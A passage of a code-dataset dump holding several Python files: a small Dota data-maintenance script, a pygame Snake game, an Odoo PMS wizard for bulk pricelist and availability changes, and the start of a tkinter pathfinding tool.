file.read()\r\n rdict = yaml.safe_load(rstring)\r\n least = 10\r\n if len(rdict) > 4:\r\n for i in rdict:\r\n if i['threshold'] < least:\r\n print(i['threshold'])\r\n least = i['threshold']\r\n bootid = i['mid']\r\n with open(midfile, \"r+\") as file:\r\n rstring = file.read()\r\n rstring = rstring[:-2]\r\n rstring = '['+rstring+']'\r\n rlist = yaml.safe_load(rstring)\r\n for i in rlist:\r\n if i['matchid'] == bootid:\r\n i['matchid'] = \"*\"\r\n with open(midfile, \"w+\") as file:\r\n rstring = json.dumps(rlist, indent=-1)\r\n file.write(rstring)\r\n","repo_name":"Racketycomic/Dota_Revamped","sub_path":"whileloopers/app/delmaintainer.py","file_name":"delmaintainer.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2645842742","text":"import pygame\r\nimport random\r\nimport time\r\nwhite=(255,255,255)\r\nblack=(0,0,0)\r\nred=(255,0,0)\r\ngreen=(0,255,0)\r\nblue=(0,0,255)\r\ndisplay_height=800\r\ndisplay_width=600\r\ngameDisplay = pygame.display.set_mode((display_height,display_width))\r\nfull_screen=pygame.display.toggle_fullscreen()\r\npygame.display.set_caption('Snakes')\r\nclock=pygame.time.Clock()\r\ndef snake(snake_width,snakelist):\r\n\tfor xny in snakelist:\r\n\t\tpygame.draw.rect(gameDisplay,green,[xny[0],xny[1],snake_width,snake_width])\r\ndef message_to_screen(msg,colour):\r\n\tscreen_text=font.render(msg,True,colour)\r\n\tgameDisplay.blit(screen_text,[display_height/2,display_width/2])\r\ndef gameLoop():\r\n\t\tcount=5\r\n\t\tsnakelist=[]\r\n\t\tcrashed=False\r\n\t\tlead_x=display_height/2\r\n\t\tlead_y=display_width/2\r\n\t\tlead_xchange=0\r\n\t\tlead_ychange=0\r\n\t\tfood_x=random.randrange(0,display_height,10)\r\n\t\tfood_y=random.randrange(0,display_width,10)\r\n\t\tsnake_width=10\r\n\t\tfood_width=30\r\n\t\tfood_counter=0\r\n\t\tgameOver=False\r\n\t\twhile not crashed:\r\n\t\t\tfor XnY in snakelist[:-1]:\r\n\t\t\t\tif XnY == snakehead:\r\n\t\t\t\t\tgameOver=True\r\n\t\t\twhile gameOver==True:\r\n\t\t\t\tmessage_to_screen('You lose, press r to play again or press q to quit.',white)\r\n\t\t\t\tmessage_to_screen('Your final score was {}'.format(food_counter),white)\r\n\t\t\t\tpygame.display.update()\r\n\t\t\t\tfor event in pygame.event.get():\r\n\t\t\t\t\tif event.type==pygame.KEYDOWN:\r\n\t\t\t\t\t\tif event.key==pygame.K_q:\r\n\t\t\t\t\t\t\tcrashed=True\r\n\t\t\t\t\t\t\tgameOver=False\r\n\t\t\t\t\t\telif event.key==pygame.K_r:\r\n\t\t\t\t\t\t\tgameLoop()\r\n\t\t\tfor event in pygame.event.get():\r\n\t\t\t\tif event.type==pygame.QUIT:\r\n\t\t\t\t\tcrashed=True\r\n\t\t\t\telif event.type==pygame.KEYDOWN:\r\n\t\t\t\t\tif event.key==pygame.K_a:\r\n\t\t\t\t\t\tlead_xchange= -snake_width\r\n\t\t\t\t\t\tlead_ychange=0\r\n\t\t\t\t\telif event.key==pygame.K_d:\r\n\t\t\t\t\t\tlead_xchange= snake_width\r\n\t\t\t\t\t\tlead_ychange=0\r\n\t\t\t\t\telif event.key==pygame.K_w:\r\n\t\t\t\t\t\tlead_ychange= -snake_width\r\n\t\t\t\t\t\tlead_xchange=0\r\n\t\t\t\t\telif event.key==pygame.K_s:\r\n\t\t\t\t\t\tlead_ychange= snake_width\r\n\t\t\t\t\t\tlead_xchange=0\r\n\t\t\tif lead_x>=food_x and lead_x<=food_x+food_width:\r\n\t\t\t\tif lead_y>=food_y and lead_y<=food_y+food_width:\r\n\t\t\t\t\tfood_x=random.randrange(0,display_height,food_width)\r\n\t\t\t\t\tfood_y=random.randrange(0,display_width,food_width)\r\n\t\t\t\t\tcount+=0.1\r\n\t\t\t\t\tfood_counter+=1\r\n\t\t\tif lead_x>=display_height or lead_y>=display_width or lead_x==0 or lead_y==0:\r\n\t\t\t\tgameOver=True\r\n\t\t\tlead_x+= lead_xchange\r\n\t\t\tlead_y+= lead_ychange\r\n\t\t\tif len(snakelist)>food_counter:\r\n\t\t\t\tdel snakelist[0]\r\n\t\t\tsnakehead=[]\r\n\t\t\tsnakehead.append(lead_x)\r\n\t\t\tsnakehead.append(lead_y)\r\n\t\t\tsnakelist.append(snakehead)\r\n\t\t\tgameDisplay.fill(black)\r\n\t\t\tpygame.draw.rect(gameDisplay,red,[food_x,food_y,food_width,food_width])\r\n\t\t\tsnake(snake_width,snakelist)\r\n\t\t\tpygame.display.update()\r\n\t\t\tclock.tick(count)\r\n\t\tpygame.quit()\r\n\t\tquit()\r\ngameLoop()\r\n\r\n\r\n","repo_name":"mubelsjedenn/snakegame","sub_path":"Snakegame.py","file_name":"Snakegame.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"888019127","text":"import datetime\n\nfrom odoo import _, api, fields, models\n\n\nclass AvailabilityWizard(models.TransientModel):\n\n _name = \"pms.massive.changes.wizard\"\n _description = \"Wizard for massive changes on Availability Plans & Pricelists.\"\n _check_pms_properties_auto = True\n\n pms_property_ids = fields.Many2many(\n string=\"Property\",\n comodel_name=\"pms.property\",\n default=lambda self: self.env[\"pms.property\"].browse(\n self.env.user.get_active_property_ids()[0]\n ),\n check_pms_properties=True,\n required=True,\n )\n massive_changes_on = fields.Selection(\n string=\"On\",\n selection=[\n (\"pricelist\", \"Pricelist\"),\n (\"availability_plan\", \"Availability Plan\"),\n ],\n default=lambda self: \"availability_plan\"\n if self._context.get(\"availability_plan_id\")\n else \"pricelist\"\n if self._context.get(\"pricelist_id\")\n else \"availability_plan\",\n required=True,\n )\n\n availability_plan_ids = fields.Many2many(\n comodel_name=\"pms.availability.plan\",\n string=\"Availability Plan to apply massive changes\",\n check_pms_properties=True,\n )\n\n pricelist_ids = fields.Many2many(\n comodel_name=\"product.pricelist\",\n string=\"Pricelist to apply massive changes\",\n check_pms_properties=True,\n )\n allowed_pricelist_ids = fields.One2many(\n string=\"Allowed pricelists\",\n comodel_name=\"product.pricelist\",\n compute=\"_compute_allowed_pricelist_ids\",\n )\n start_date = fields.Date(\n string=\"From\",\n required=True,\n )\n end_date = fields.Date(\n string=\"To\",\n required=True,\n )\n\n apply_pricelists_on = fields.Selection(\n string=\"Apply pricelists on\",\n selection=[\n (\"room_types\", \"Room Types\"),\n (\"board_services\", \"Board Services\"),\n (\"service\", \"Service\"),\n ],\n default=\"room_types\",\n )\n\n room_type_ids = fields.Many2many(\n comodel_name=\"pms.room.type\",\n string=\"Room Type\",\n check_pms_properties=True,\n compute=\"_compute_room_type_ids\",\n readonly=False,\n store=True,\n )\n\n board_service_room_type_ids = fields.Many2many(\n string=\"Room type's board services\",\n comodel_name=\"pms.board.service.room.type\",\n check_pms_properties=True,\n compute=\"_compute_board_service_room_type_ids\",\n readonly=False,\n store=True,\n )\n\n board_service = fields.Many2one(\n string=\"Board service\",\n comodel_name=\"product.product\",\n check_pms_properties=True,\n domain=\"[('id', 'in',allowed_board_services)]\",\n )\n\n allowed_board_services = fields.Many2many(\n string=\"Allowed services\",\n comodel_name=\"product.product\",\n compute=\"_compute_allowed_board_services\",\n readonly=False,\n store=True,\n )\n service = fields.Many2one(\n string=\"Service\",\n comodel_name=\"product.product\",\n check_pms_properties=True,\n compute=\"_compute_service\",\n readonly=False,\n store=True,\n )\n date_types = fields.Selection(\n string=\"Date types\",\n selection=[\n (\"sale_dates\", \"Sale Dates\"),\n (\"consumption_dates\", \"Consumption Dates\"),\n ],\n default=\"consumption_dates\",\n )\n\n price = fields.Float(string=\"Price\")\n min_quantity = fields.Float(string=\"Min. Quantity\")\n\n min_stay = fields.Integer(\n string=\"Min. Stay\",\n default=0,\n )\n min_stay_arrival = fields.Integer(\n string=\"Min. Stay Arrival\",\n default=0,\n )\n max_stay = fields.Integer(\n string=\"Max. Stay\",\n default=0,\n )\n max_stay_arrival = fields.Integer(\n string=\"Max. Stay Arrival\",\n default=0,\n )\n closed = fields.Boolean(\n string=\"Closed\",\n default=False,\n )\n closed_departure = fields.Boolean(\n string=\"Closed Departure\",\n default=False,\n )\n closed_arrival = fields.Boolean(\n string=\"Closed Arrival\",\n default=False,\n )\n quota = fields.Integer(\n string=\"Quota\",\n help=\"Generic Quota assigned.\",\n default=-1,\n )\n max_avail = fields.Integer(\n string=\"Max. Availability\",\n help=\"Maximum simultaneous availability on own Booking Engine.\",\n default=-1,\n )\n apply_on_monday = fields.Boolean(\n string=\"Apply Availability Rule on mondays\",\n default=False,\n )\n apply_on_tuesday = fields.Boolean(\n string=\"Apply Availability Rule on tuesdays\",\n default=False,\n )\n apply_on_wednesday = fields.Boolean(\n string=\"Apply Availability Rule on wednesdays\",\n default=False,\n )\n apply_on_thursday = fields.Boolean(\n string=\"Apply Availability Rule on thursdays\",\n default=False,\n )\n apply_on_friday = fields.Boolean(\n string=\"Apply Availability Rule on fridays\",\n default=False,\n )\n apply_on_saturday = fields.Boolean(\n string=\"Apply Availability Rule on saturdays\",\n default=False,\n )\n apply_on_sunday = fields.Boolean(\n string=\"Apply Availability Rule on sundays\",\n default=False,\n )\n apply_on_all_week = fields.Boolean(\n string=\"Apply Availability Rule for the whole week\",\n default=True,\n )\n apply_min_stay = fields.Boolean(\n string=\"Apply changes to Min. Stay\",\n default=False,\n )\n\n apply_min_stay_arrival = fields.Boolean(\n string=\"Apply changes to Min. Stay Arrival\",\n default=False,\n )\n\n apply_max_stay = fields.Boolean(\n string=\"Apply changes to Max. Stay\",\n default=False,\n )\n\n apply_max_stay_arrival = fields.Boolean(\n string=\"Apply changes to Max. Stay Arrival\",\n default=False,\n )\n\n apply_quota = fields.Boolean(\n string=\"Apply changes to Quota\",\n default=False,\n )\n\n apply_max_avail = fields.Boolean(\n string=\"Apply changes to Max. Avail.\",\n default=False,\n )\n\n apply_closed = fields.Boolean(\n string=\"Apply changes to Closed\",\n default=False,\n )\n\n apply_closed_arrival = fields.Boolean(\n string=\"Apply changes to Closed Arrival\",\n default=False,\n )\n\n apply_closed_departure = fields.Boolean(\n string=\"Apply changes to Closed Departure\",\n default=False,\n )\n\n rules_to_overwrite = fields.One2many(\n string=\"Rule to Overwrite\",\n readonly=True,\n store=False,\n comodel_name=\"pms.availability.plan.rule\",\n compute=\"_compute_rules_to_overwrite\",\n )\n pricelist_items_to_overwrite = fields.One2many(\n string=\"Pricelist Items to Override\",\n readonly=True,\n store=False,\n comodel_name=\"product.pricelist.item\",\n compute=\"_compute_pricelist_items_to_overwrite\",\n )\n num_rules_to_overwrite = fields.Integer(\n string=\"Rules to overwrite on massive changes\",\n readonly=True,\n store=False,\n compute=\"_compute_num_rules_to_overwrite\",\n )\n num_pricelist_items_to_overwrite = fields.Integer(\n string=\"Pricelist items to overwrite on massive changes\",\n compute=\"_compute_num_pricelist_items_to_overwrite\",\n readonly=True,\n store=False,\n )\n avail_readonly = fields.Boolean(\n string=\"Avialability Readonly\",\n default=lambda self: self._default_avail_readonly(),\n )\n pricelist_readonly = fields.Boolean(\n string=\"Pricelist Readonly\",\n default=lambda self: self._default_pricelist_readonly(),\n )\n\n def _default_avail_readonly(self):\n return True if self._context.get(\"availability_plan_id\") else False\n\n def _default_pricelist_readonly(self):\n return True if self._context.get(\"pricelist_id\") else False\n\n @api.depends(\"massive_changes_on\")\n def _compute_allowed_pricelist_ids(self):\n for record in self:\n record.allowed_pricelist_ids = self.env[\"product.pricelist\"].search(\n [\n (\"is_pms_available\", \"=\", True),\n (\"pricelist_type\", \"=\", \"daily\"),\n ]\n )\n\n @api.depends(\"apply_pricelists_on\")\n def _compute_room_type_ids(self):\n for record in self:\n if (\n record.apply_pricelists_on == \"board_services\"\n or record.apply_pricelists_on == \"service\"\n ):\n record.room_type_ids = False\n\n @api.depends(\"apply_pricelists_on\", \"board_service\")\n def _compute_board_service_room_type_ids(self):\n for record in self:\n if (\n record.apply_pricelists_on == \"room_types\"\n or record.apply_pricelists_on == \"service\"\n ):\n record.board_service_room_type_ids = False\n record.board_service = False\n else:\n if not record.board_service_room_type_ids:\n allowed_board_service_room_type_ids = []\n all_board_service_room_type_ids = self.env[\n \"pms.board.service.room.type\"\n ].search([])\n if record.board_service:\n for (\n board_service_room_type_id\n ) in all_board_service_room_type_ids:\n if (\n record.board_service\n in board_service_room_type_id.board_service_line_ids.mapped(\n \"product_id\"\n )\n ):\n allowed_board_service_room_type_ids.append(\n board_service_room_type_id.id\n )\n else:\n allowed_board_service_room_type_ids = (\n all_board_service_room_type_ids.ids\n )\n domain = []\n if allowed_board_service_room_type_ids:\n domain.append((\"id\", \"in\", allowed_board_service_room_type_ids))\n record.board_service_room_type_ids = (\n self.env[\"pms.board.service.room.type\"].search(domain)\n if domain\n else False\n )\n\n @api.depends(\"apply_pricelists_on\")\n def _compute_service(self):\n for record in self:\n if (\n record.apply_pricelists_on == \"board_services\"\n or record.apply_pricelists_on == \"room_types\"\n ):\n record.service = False\n\n @api.depends(\"board_service_room_type_ids\")\n def _compute_allowed_board_services(self):\n for record in self:\n if not record.board_service_room_type_ids:\n record.allowed_board_services = (\n self.env[\"pms.board.service.room.type\"]\n .search([])\n .board_service_line_ids.mapped(\"product_id\")\n )\n else:\n product_ids = []\n for bs_room_type_id in record.board_service_room_type_ids:\n tmp_list = bs_room_type_id.board_service_line_ids.mapped(\n \"product_id\"\n ).ids\n\n product_ids = (\n tmp_list\n if not product_ids\n else product_ids\n if record.board_service_room_type_ids\n else list(set(tmp_list) & set(product_ids))\n )\n\n record.allowed_board_services = self.env[\"product.product\"].search(\n [\n (\n \"id\",\n \"in\",\n product_ids,\n )\n ]\n )\n\n def _rules_to_overwrite_by_plans(self, availability_plans):\n self.ensure_one()\n domain = [\n (\"pms_property_id\", \"in\", self.pms_property_ids.ids),\n (\"availability_plan_id\", \"in\", availability_plans.ids),\n ]\n\n if self.room_type_ids:\n domain.append((\"room_type_id\", \"in\", self.room_type_ids.ids))\n if self.start_date:\n domain.append((\"date\", \">=\", self.start_date))\n if self.end_date:\n domain.append((\"date\", \"<=\", self.end_date))\n\n rules = self.env[\"pms.availability.plan.rule\"]\n if self.start_date and self.end_date:\n rules = rules.search(domain)\n if not self.apply_on_all_week and self.start_date and self.end_date:\n week_days_to_apply = (\n self.apply_on_monday,\n self.apply_on_tuesday,\n self.apply_on_wednesday,\n self.apply_on_thursday,\n self.apply_on_friday,\n self.apply_on_saturday,\n self.apply_on_sunday,\n )\n rules = rules.filtered(\n lambda x: week_days_to_apply[x.date.timetuple()[6]]\n )\n\n return rules\n\n @api.depends(\n \"start_date\",\n \"end_date\",\n \"room_type_ids\",\n \"apply_on_monday\",\n \"apply_on_tuesday\",\n \"apply_on_wednesday\",\n \"apply_on_thursday\",\n \"apply_on_friday\",\n \"apply_on_saturday\",\n \"apply_on_sunday\",\n \"apply_on_all_week\",\n \"availability_plan_ids\",\n \"apply_quota\",\n \"apply_max_avail\",\n \"apply_min_stay\",\n \"apply_min_stay_arrival\",\n \"apply_max_stay\",\n \"apply_max_stay_arrival\",\n \"apply_closed\",\n \"apply_closed_arrival\",\n \"apply_closed_departure\",\n \"min_stay\",\n \"max_stay\",\n \"min_stay_arrival\",\n \"max_stay_arrival\",\n \"closed\",\n \"closed_arrival\",\n \"closed_departure\",\n \"quota\",\n \"max_avail\",\n )\n def _compute_rules_to_overwrite(self):\n for record in self:\n if not record.availability_plan_ids and self._context.get(\n \"availability_plan_id\"\n ):\n record.availability_plan_ids = [\n (4, self._context.get(\"availability_plan_id\"))\n ]\n record.massive_changes_on = \"availability_plan\"\n\n record.rules_to_overwrite = record._rules_to_overwrite_by_plans(\n record.availability_plan_ids\n )\n\n @api.depends(\n \"start_date\",\n \"end_date\",\n \"room_type_ids\",\n \"board_service_room_type_ids\",\n \"board_service\",\n \"service\",\n \"apply_pricelists_on\",\n \"date_types\",\n \"apply_on_monday\",\n \"apply_on_tuesday\",\n \"apply_on_wednesday\",\n \"apply_on_thursday\",\n \"apply_on_friday\",\n \"apply_on_saturday\",\n \"apply_on_sunday\",\n \"apply_on_all_week\",\n \"pricelist_ids\",\n \"pms_property_ids\",\n )\n def _compute_pricelist_items_to_overwrite(self):\n for record in self:\n if not record.pricelist_ids and self._context.get(\"pricelist_id\"):\n record.pricelist_ids = [(4, self._context.get(\"pricelist_id\"))]\n record.massive_changes_on = \"pricelist\"\n\n if (\n record.pricelist_ids\n and record.start_date\n and record.end_date\n and record.pms_property_ids\n ):\n domain = [\n (\"pricelist_id\", \"in\", record.pricelist_ids.ids),\n \"|\",\n (\"pms_property_ids\", \"=\", False),\n (\"pms_property_ids\", \"in\", record.pms_property_ids.ids),\n ]\n\n if record.date_types == \"sale_dates\":\n domain.append(\n (\n \"date_start\",\n \">=\",\n datetime.datetime.combine(\n record.start_date, datetime.datetime.min.time()\n ),\n )\n )\n domain.append(\n (\n \"date_start\",\n \"<=\",\n datetime.datetime.combine(\n record.end_date, datetime.datetime.max.time()\n ),\n )\n )\n elif record.date_types == \"consumption_dates\":\n domain.append((\"date_start_consumption\", \">=\", record.start_date))\n domain.append((\"date_end_consumption\", \"<=\", record.end_date))\n\n product_ids = self.generate_product_ids_to_filter(\n record.apply_pricelists_on,\n record.room_type_ids,\n record.board_service_room_type_ids,\n record.board_service,\n record.service,\n )\n if product_ids:\n domain.append(\n (\n \"product_id\",\n \"in\",\n product_ids,\n )\n )\n if record.board_service_room_type_ids:\n domain.append(\n (\n \"board_service_room_type_id\",\n \"in\",\n record.board_service_room_type_ids.ids,\n )\n )\n week_days_to_apply = (\n record.apply_on_monday,\n record.apply_on_tuesday,\n record.apply_on_wednesday,\n record.apply_on_thursday,\n record.apply_on_friday,\n record.apply_on_saturday,\n record.apply_on_sunday,\n )\n\n if record.start_date and record.end_date:\n items = self.env[\"product.pricelist.item\"].search(domain)\n if (\n not record.apply_on_all_week\n and record.start_date\n and record.end_date\n ):\n items_filtered = False\n if record.date_types == \"consumption_dates\":\n items_filtered = items.filtered(\n lambda x: x.date_end_consumption\n and week_days_to_apply[\n x.date_end_consumption.timetuple()[6]\n ]\n )\n elif record.date_types == \"sale_dates\":\n items_filtered = items.filtered(\n lambda x: x.date_end\n and week_days_to_apply[x.date_end.date().timetuple()[6]]\n )\n record.pricelist_items_to_overwrite = items_filtered\n else:\n record.pricelist_items_to_overwrite = items\n else:\n record.pricelist_items_to_overwrite = False\n else:\n record.pricelist_items_to_overwrite = False\n\n @api.depends(\n \"rules_to_overwrite\",\n )\n def _compute_num_rules_to_overwrite(self):\n for record in self:\n self.num_rules_to_overwrite = len(record.rules_to_overwrite)\n\n @api.depends(\n \"pricelist_items_to_overwrite\",\n )\n def _compute_num_pricelist_items_to_overwrite(self):\n for record in self:\n self.num_pricelist_items_to_overwrite = len(\n record.pricelist_items_to_overwrite\n )\n\n @api.model\n def generate_product_ids_to_filter(\n self,\n apply_pricelists_on,\n room_type_ids,\n board_service_room_type_ids,\n board_service,\n service,\n ):\n product_ids = False\n all_room_type_ids = self.env[\"pms.room.type\"].search([]).ids\n\n if apply_pricelists_on == \"room_types\":\n room_type_ids = room_type_ids.ids\n if not room_type_ids:\n room_type_ids = all_room_type_ids\n product_ids = (\n self.env[\"pms.room.type\"]\n .search([(\"id\", \"in\", room_type_ids)])\n .mapped(\"product_id\")\n .ids\n )\n elif apply_pricelists_on == \"board_services\":\n if board_service:\n product_ids = [board_service.id]\n elif not board_service_room_type_ids and not board_service:\n product_ids = (\n self.env[\"pms.board.service.room.type\"]\n .search([])\n .board_service_line_ids.mapped(\"product_id\")\n .ids\n )\n else:\n bsrti = board_service_room_type_ids\n product_ids = bsrti.board_service_line_ids.mapped(\"product_id\").ids\n\n elif apply_pricelists_on == \"service\":\n domain = []\n product_ids_board_services = (\n self.env[\"pms.board.service.room.type\"]\n .search([])\n .board_service_line_ids.mapped(\"product_id\")\n .ids\n )\n if product_ids_board_services:\n domain.append((\"id\", \"not in\", product_ids_board_services))\n if service:\n domain.append((\"id\", \"=\", service.id))\n product_ids = self.env[\"product.product\"].search(domain).ids\n\n return product_ids\n\n @api.model\n def generate_dates_vals(\n self,\n date_types,\n vals,\n date,\n ):\n if date_types == \"sale_dates\":\n vals[\"date_start\"] = datetime.datetime.combine(\n date, datetime.datetime.min.time()\n )\n vals[\"date_end\"] = datetime.datetime.combine(\n date, datetime.datetime.max.time()\n )\n else:\n vals[\"date_start_consumption\"] = date\n vals[\"date_end_consumption\"] = date\n return vals\n\n @api.model\n def create_pricelists_items_room_types(\n self,\n room_types,\n pricelist_ids,\n price,\n min_quantity,\n pms_property,\n date,\n date_types,\n ):\n new_items = []\n for room_type in room_types:\n for pricelist in pricelist_ids:\n vals = {\n \"pricelist_id\": pricelist.id,\n \"compute_price\": \"fixed\",\n \"applied_on\": \"0_product_variant\",\n \"product_id\": room_type.product_id.id,\n \"fixed_price\": price,\n \"min_quantity\": min_quantity,\n \"pms_property_ids\": [pms_property.id],\n }\n vals = self.generate_dates_vals(date_types, vals, date)\n\n pricelist_item = self.env[\"product.pricelist.item\"].create(vals)\n new_items.append(pricelist_item.id)\n return new_items\n\n @api.model\n def create_pricelists_items_board_services(\n self,\n board_service_room_type_ids,\n pricelist_ids,\n board_service,\n price,\n min_quantity,\n pms_property,\n date_types,\n date,\n ):\n new_items = []\n for bs_room_type in board_service_room_type_ids:\n for pricelist in pricelist_ids:\n if board_service:\n vals = {\n \"pricelist_id\": pricelist.id,\n \"compute_price\": \"fixed\",\n \"applied_on\": \"0_product_variant\",\n \"product_id\": board_service.id,\n \"board_service_room_type_id\": bs_room_type.id,\n \"fixed_price\": price,\n \"min_quantity\": min_quantity,\n \"pms_property_ids\": [pms_property.id],\n }\n vals = self.generate_dates_vals(date_types, vals, date)\n\n pricelist_item = self.env[\"product.pricelist.item\"].create(vals)\n new_items.append(pricelist_item.id)\n\n else:\n for (\n board_service_line\n ) in bs_room_type.pms_board_service_id.board_service_line_ids:\n vals = {\n \"pricelist_id\": pricelist.id,\n \"compute_price\": \"fixed\",\n \"applied_on\": \"0_product_variant\",\n \"product_id\": board_service_line.product_id.id,\n \"board_service_room_type_id\": bs_room_type.id,\n \"fixed_price\": price,\n \"min_quantity\": min_quantity,\n \"pms_property_ids\": [pms_property.id],\n }\n vals = self.generate_dates_vals(date_types, vals, date)\n\n pricelist_item = self.env[\"product.pricelist.item\"].create(vals)\n new_items.append(pricelist_item.id)\n return new_items\n\n @api.model\n def create_availability_plans_rules(\n self,\n room_types,\n availability_plan_ids,\n min_stay,\n apply_min_stay,\n min_stay_arrival,\n apply_min_stay_arrival,\n max_stay,\n apply_max_stay,\n max_stay_arrival,\n apply_max_stay_arrival,\n quota,\n apply_quota,\n max_avail,\n apply_max_avail,\n closed,\n apply_closed,\n closed_arrival,\n apply_closed_arrival,\n closed_departure,\n apply_closed_departure,\n date,\n rules_to_overwrite,\n pms_property,\n ):\n new_items = []\n for room_type in room_types:\n for avail_plan_id in availability_plan_ids:\n vals = {}\n vals.update({\"min_stay\": min_stay} if apply_min_stay else {})\n vals.update(\n {\"min_stay_arrival\": min_stay_arrival}\n if apply_min_stay_arrival\n else {}\n )\n vals.update({\"max_stay\": max_stay} if apply_max_stay else {})\n\n vals.update(\n {\"max_stay_arrival\": max_stay_arrival}\n if apply_max_stay_arrival\n else {}\n )\n vals.update({\"quota\": quota} if apply_quota else {})\n vals.update({\"max_avail\": max_avail} if apply_max_avail else {})\n\n vals.update({\"closed\": closed} if apply_closed else {})\n vals.update(\n {\"closed_arrival\": closed_arrival} if apply_closed_arrival else {}\n )\n vals.update(\n {\"closed_departure\": closed_departure}\n if apply_closed_departure\n else {}\n )\n\n if date in rules_to_overwrite.mapped(\n \"date\"\n ) and room_type in rules_to_overwrite.mapped(\"room_type_id\"):\n overwrite = rules_to_overwrite.filtered(\n lambda x: x.room_type_id == room_type\n and x.date == date\n and x.pms_property_id.id == pms_property.id\n )\n overwrite.write(vals)\n new_items += overwrite.ids\n else:\n plan_rule = self.env[\"pms.availability.plan.rule\"].create(\n {\n \"availability_plan_id\": avail_plan_id.id,\n \"date\": date,\n \"room_type_id\": room_type.id,\n \"quota\": quota,\n \"max_avail\": max_avail,\n \"min_stay\": min_stay,\n \"min_stay_arrival\": min_stay_arrival,\n \"max_stay\": max_stay,\n \"max_stay_arrival\": max_stay_arrival,\n \"closed\": closed,\n \"closed_arrival\": closed_arrival,\n \"closed_departure\": closed_departure,\n \"pms_property_id\": pms_property.id,\n }\n )\n new_items.append(plan_rule.id)\n\n return new_items\n\n def continue_massive_changes(self):\n self.apply_massive_changes()\n return {\n \"name\": _(\"Massive changes on Pricelist and Availability Plans\"),\n \"res_model\": \"pms.massive.changes.wizard\",\n \"type\": \"ir.actions.act_window\",\n \"view_id\": self.env.ref(\"pms.massive_changes_wizard\").id,\n \"target\": \"new\",\n \"view_mode\": \"form\",\n \"context\": {\n \"default_massive_changes_on\": self.massive_changes_on,\n \"default_start_date\": self.start_date,\n \"default_end_date\": self.end_date,\n \"default_pms_property_ids\": [(6, 0, self.pms_property_ids.ids)],\n \"default_pricelist_ids\": [(6, 0, self.pricelist_ids.ids)],\n \"default_availability_plan_ids\": [\n (6, 0, self.availability_plan_ids.ids)\n ],\n },\n }\n\n def save_and_close(self):\n items = self.apply_massive_changes()\n if self.massive_changes_on == \"pricelist\" and not self.pricelist_readonly:\n action = {\n \"view\": self.env.ref(\"pms.product_pricelist_item_action2\").read()[0]\n }\n action[\"view\"][\"domain\"] = [(\"id\", \"in\", items)]\n return action[\"view\"]\n\n if self.massive_changes_on == \"availability_plan\" and not self.avail_readonly:\n action = {\n \"view\": self.env.ref(\n \"pms.availability_plan_rule_view_tree_action\"\n ).read()[0]\n }\n action[\"view\"][\"domain\"] = [(\"id\", \"in\", items)]\n return action[\"view\"]\n\n def apply_massive_changes(self):\n self.ensure_one()\n self.pricelist_items_to_overwrite.unlink()\n week_days_to_apply = (\n self.apply_on_monday,\n self.apply_on_tuesday,\n self.apply_on_wednesday,\n self.apply_on_thursday,\n self.apply_on_friday,\n self.apply_on_saturday,\n self.apply_on_sunday,\n )\n\n # dates between start and end (both included)\n items = []\n for date in [\n self.start_date + datetime.timedelta(days=x)\n for x in range(0, (self.end_date - self.start_date).days + 1)\n ]:\n\n if (\n not self.apply_on_all_week\n and not week_days_to_apply[date.timetuple()[6]]\n ):\n continue\n\n if not self.room_type_ids:\n room_types = self.env[\"pms.room.type\"].search(\n [\n \"|\",\n (\"pms_property_ids\", \"=\", False),\n (\"pms_property_ids\", \"in\", self.pms_property_ids.ids),\n ]\n )\n else:\n room_types = self.room_type_ids\n\n for pms_property in self.pms_property_ids:\n if (\n self.massive_changes_on == \"pricelist\"\n and self.apply_pricelists_on == \"room_types\"\n ):\n new_items = self.create_pricelists_items_room_types(\n room_types,\n self.pricelist_ids,\n self.price,\n self.min_quantity,\n pms_property,\n date,\n self.date_types,\n )\n items = items + new_items if new_items else items\n\n elif (\n self.massive_changes_on == \"pricelist\"\n and self.apply_pricelists_on == \"board_services\"\n ):\n new_items = self.create_pricelists_items_board_services(\n self.board_service_room_type_ids,\n self.pricelist_ids,\n self.board_service,\n self.price,\n self.min_quantity,\n pms_property,\n self.date_types,\n date,\n )\n items = items + new_items if new_items else items\n\n elif (\n self.massive_changes_on == \"pricelist\"\n and self.apply_pricelists_on == \"service\"\n ):\n for pricelist in self.pricelist_ids:\n if self.service:\n vals = {\n \"pricelist_id\": pricelist.id,\n \"compute_price\": \"fixed\",\n \"applied_on\": \"0_product_variant\",\n \"product_id\": self.service.id,\n \"fixed_price\": self.price,\n \"min_quantity\": self.min_quantity,\n \"pms_property_ids\": [pms_property.id],\n }\n vals = self.generate_dates_vals(self.date_types, vals, date)\n\n pricelist_item = self.env[\"product.pricelist.item\"].create(\n vals\n )\n items.append(pricelist_item.id)\n elif self.massive_changes_on == \"availability_plan\":\n\n new_items = self.create_availability_plans_rules(\n room_types,\n self.availability_plan_ids,\n self.min_stay,\n self.apply_min_stay,\n self.min_stay_arrival,\n self.apply_min_stay_arrival,\n self.max_stay,\n self.apply_max_stay,\n self.max_stay_arrival,\n self.apply_max_stay_arrival,\n self.quota,\n self.apply_quota,\n self.max_avail,\n self.apply_max_avail,\n self.closed,\n self.apply_closed,\n self.closed_arrival,\n self.apply_closed_arrival,\n self.closed_departure,\n self.apply_closed_departure,\n date,\n self.rules_to_overwrite,\n pms_property,\n )\n items = items + new_items if new_items else items\n return items\n","repo_name":"OCA/pms","sub_path":"pms/wizards/wizard_massive_changes.py","file_name":"wizard_massive_changes.py","file_ext":"py","file_size_in_byte":35394,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"68"} +{"seq_id":"7028140499","text":"#!.venv/bin/python\n\nimport tkinter as tk\nfrom tkinter import font\n\nfrom time import perf_counter\nfrom math import sqrt, inf\nfrom random import randrange\n\nfrom queue import PriorityQueue\nfrom numba import njit\n\nfrom os import path, mkdir\n\n# Configurations ##############################################################\n\nclass State:\n IDLE = 0\n EDIT_START = 1\n EDIT_END = 2\n EDIT_MAP = 3\n\nclass Color:\n START = '#16a34a'\n END = '#dc2626'\n GRID = '#a3a3a3'\n CURSOR = '#000000'\n LINE = '#facc15'\n MAP = '#2563eb'\n POLYGON = '#bfdbfe'\n PREVIEW = '#475569'\n GRAPH = '#60a5fa'\n\nWIDTH = 1024\nHEIGHT = 768\nINF = inf\nPADDING = 10\nDOT_RADIUS = 5\nTILE_SIZE = 32\nFONT_SIZE = 